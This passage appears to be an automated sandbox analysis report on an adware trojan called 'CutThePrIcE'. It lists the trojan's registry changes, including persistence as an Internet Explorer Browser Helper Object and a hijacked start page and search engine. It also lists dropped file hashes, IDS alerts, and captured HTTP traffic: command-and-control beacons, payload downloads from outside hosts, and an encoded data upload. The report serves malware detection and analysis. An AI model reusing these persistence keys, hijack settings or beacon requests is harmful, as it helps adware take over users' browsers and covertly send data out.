[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\Programmable]
"(Default)" = ""

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.dll"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{0B079ECD-60E4-40B9-9FAC-4ECC98AB8786}\TypeLib]
"Version" = "1.0"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CurVer]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}]
"(Default)" = "IRegistry"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{296EA12C-9126-48AA-AC11-7ECC0463D2B2}" = "1"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_]
"(Default)" = "CutThePrIcE"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\CutThePrIcE"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = ""

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3967CDA8-3EAB-4115-84F1-C29A9C5FB484}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_\CLSID]
"(Default)" = "{296EA12C-9126-48AA-AC11-7ECC0463D2B2}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 9A 22 EF 01 B1 0F C1 82 2F BE 83 3A ED 10 D2"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\ProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9"

[HKCR\CLSID\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}\VersionIndependentProgID]
"(Default)" = "P296EA12C_9126_48AA_AC11_7ECC0463D2B2_"

[HKCR\Interface\{B0030E0C-349C-4EB5-AD5E-847B43C0D844}]
"(Default)" = "ILocalStorage"

[HKCR\P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.P296EA12C_9126_48AA_AC11_7ECC0463D2B2_.9]
"(Default)" = "CutThePrIcE"

[HKCR\TypeLib\{330ED369-73D2-49BC-AC43-1E21602F742D}\1.0\0\win32]
"(Default)" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.tlb"

[HKCR\Interface\{9F5974D4-08A9-4422-9F36-76103BEE67A1}\TypeLib]
"(Default)" = "{330ED369-73D2-49BC-AC43-1E21602F742D}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{296EA12C-9126-48AA-AC11-7ECC0463D2B2}]
"(Default)" = "CutThePrIcE"
"NoExplorer" = "1"

The process hpds_setup.exe:164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted" = "0"
"FaviconURL" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"f176879d" = "GxAy/Xl/blAu////"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"64fc053d" = "M/////%%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"FaviconURLFallback" = "websearch.coolfindings.info/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"DisplayName" = "WebSearch"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "websearch.coolfindings.info/?pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"URL" = "websearch.coolfindings.info/?l=1&q={searchTerms}&pid=24379&r=2015/07/01&hid=8738532578695851691&lg=EN&cc=UA"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\0caebbe2]
"05502537" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/UlAv/XD/cxAp/XV/alAj/B2/HPAs/X6////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"d7cea243" = "clAu/XZ/blAu/XD/bxAs/Xx/UxAs/X6/alAm/XF/HPAj/XP/HPAj/Xb/bl/j/Xt/axAv/X6/Ul/9/Y//HPAt/Ch/Vx/h/CV/Ml/3/BF/bx/7/CZ/V//e/CJ/Ul/l/Cb/Ul/l/CD/SxAq/Xt/G//7/Cx/Ml/g/Cx/MP/g/CZ/MP/1/Cx/Mx/3/CJ/N// /CD/Mx/3/CD/SxAm/Xb/OPAW/D2/SxAs/XV/OPAK/DD////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"94362f76" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\2038a74d]
"fd0dde78" = "KlAu/XZ/JlAu/XD/bxAs/Xx////%"

[HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}\_1874529f\7fe0f877]
"fd0dde78" = "dlAB/DZ/Ml/h/DP/QP/ /Ct/UPAB/DV/M/AC/Bh/M//e/Cb/Vx/i/Ct/PPAC/CP/UP/1/CV/Vl/e/CJ/Qx/1/CD/PlAX/DF/QPA7////"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}]
"Deleted"

Dropped PE files

MD5 | File path
5b4046db8f3c698418f9b2b51d8c292f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1F50\temp\NybbleCrawler.xyz.exe
2d3705d26f35d66e26b7300384bc01dc | c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.dll
2e1bb4d22880abbf5df8f4343e16c356 | c:\Program Files\CutThePrIcE\F9Kz7xj8t8M4Vo.exe
c9456944ec1989ab0e2bf9e23df1c952 | c:\Program Files\CutaThePrice\CutaThePrice.exe
f3cf89605ef83f1f6e4ffbfb8b6cef70 | c:\Program Files\TerminusKeeper\TerminusKeeper.dll
635d528b505f4ffa3a6b4aea855c5001 | c:\Program Files\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe
6e7027aac3d75239fa9684eb5a8863c4 | c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.dll
34b46fb135e5264c60ddcf36b0c718bd | c:\Program Files\bestadblocker\tEp7pMPAVoxXWr.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5
.text | 4096 | 47280 | 47616 | 4.40241 | 37d612d6a9acb8f84028f2746ecfb55f
.rdata | 53248 | 141036 | 141312 | 5.41827 | 592d08be8b4356e664ca45751ece4f2c
.data | 196608 | 28948 | 21504 | 0.904746 | 8c041560eefe8cbc360ca9f34a66f7b9
.rsrc | 229376 | 17904 | 17920 | 4.42194 | 70bd0d0b9733e9bf46a2af29c22a6241
.reloc | 249856 | 4766 | 5120 | 3.19352 | cac48ca405a5247f77ff5eb0ad24c76c

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin

Traffic

GET /?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:10 GMT
Content-Type: text/html
Content-Length: 10286
Connection: close
Content-Disposition: attachment; filename="6_1.txt"

<<< skipped >>>

GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&dd=4&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:13 GMT
Content-Type: application/octet-stream
Content-Length: 545626
Connection: close
Content-Disposition: attachment; filename="hVwDePRrG2aSqC.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

GET /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 01 Jul 2015 04:55:15 GMT
Content-Type: application/octet-stream
Content-Length: 1085440
Last-Modified: Wed, 04 Feb 2015 13:58:06 GMT
Connection: close
ETag: "54d2256e-109000"
Accept-Ranges: bytes

<<< skipped >>>

GET /?step_id=6_1_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:19 GMT
Content-Type: text/html
Content-Length: 10226
Connection: close
Content-Disposition: attachment; filename="6_1_2.txt"

<<< skipped >>>

GET /?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:06 GMT
Content-Type: text/html
Content-Length: 8364
Connection: close
Content-Disposition: attachment; filename="4_2.txt"

<<< skipped >>>

GET /?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8366
Connection: close
Content-Disposition: attachment; filename="4.txt"

<<< skipped >>>

GET /?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 6714
Connection: close
Content-Disposition: attachment; filename="5.txt"

<<< skipped >>>

POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5958
Cache-Control: no-cache

data=/Wg8/rvm30eXNBCDWYo6y&report=EoWEfO6Cpa i3NvZTV4ZYCimFI04jjvSuiR3cLYmpTZbPHy29g1HxId40XDF/bIXs6JmMFhEyrtdka6URZidHpwsRYdsErYKPOYN9M7fMp5PA2qYivrNeigFmHNOqahSB Be8CNnjLYxieXrkwcx1N7AeAGA1BUEQImrZwv3XaajCLaSKCwiIIX14fKW9nujhqLY3Zu5Y0b5K0SjQkFfaE48kKUdQtBbeXxmpFDG18jZQtzaTNjyFjCdZgWv3kJ3f893Hk9TgEl1QzRp1h0y3HKBAYezrz3xL9ZjTHNoZbH4K9TP6eqLEczHtcBFyfKPovcQxYelKRgDQe16Ymds6m18UsBVSlDEBSC3XKEjLYINMRefhZVMDCFeF6PjRrJ mV4IMcxXwoeK1uPT8AMzRWgve NsqIIMxalnqR1rcY4ys0Rs5WTn7cZbMlADVNdSUD2Yju0HaCeZD2rY1MrVQmwI85oy4LiXpGyJuqg89eIn8KeYYfQjnkopFXcX1EwZKyf2OK2h9Pyg EpQpk3FeoaLC8HZ5SXScPO2ZD3qgKgbDrbNidqrXhFfUGcMT/dxyvtcTKOFMOCGGhvGdDYNFr2P6RCk3ZAaipHsIW5qJIWK2XKzUAYNqUrHYaGaqzJJPIKTuOK7JirrVCRG81sPabzS 6zViEX FzNmqxzqFcKJoXVJuhDFI qe2wQ57HpCdDOJhYV8dSkucbxLktnWccBMG6nSUY71rEXeXVNZIOvcGOlpdS1ASO2UroNOvgunHZis1HRYN40EwNyk6zEsc2y2If RjYQZXILVKCcaAKH21Knq5uYTq0s/C1N18bXbt52X0Lx4T3Kls /y5pFktM7YgAnabbaEXFbgwJyIwod3FSWyuASo4piXZEHGAhtr1RSSjHup31CU8eY F1k/B90MQyjOAaGd 4KBF9vRCTnT6OVlAZ/tbRop08PbouNO/c52 /PGGYgpmNfHfns3OiYGqE9XrvicsYcpI ycY80JW8YHeBqY2G4eSjBE9skSoP6nHsQ3kP 6WzaxqD7nkP1kEAMqn4CgVdBKwkfXkD 8o9anUx2S5QqGQcMX8h3KZKu175ij2TtX/cyQUUpfkQdoUS8vIlYNthicK8/hDd8tHoAgEafNUU65r8pn 4U nCO0KI2RwfRrhkFOW2EfGO1jMEZ56LaNydtxSSfcP0BtRdUwFj0fZ6JbBQZ9aoACnA9QAsIfRP Bcohv45LefD1kCu5Rm1CkqNK7XOapiBj ENQGtVLnIq2B
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:34 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..


GET /?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 2734
Connection: close
Content-Disposition: attachment; filename="4_3.txt"

<<< skipped >>>

POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5368
Cache-Control: no-cache

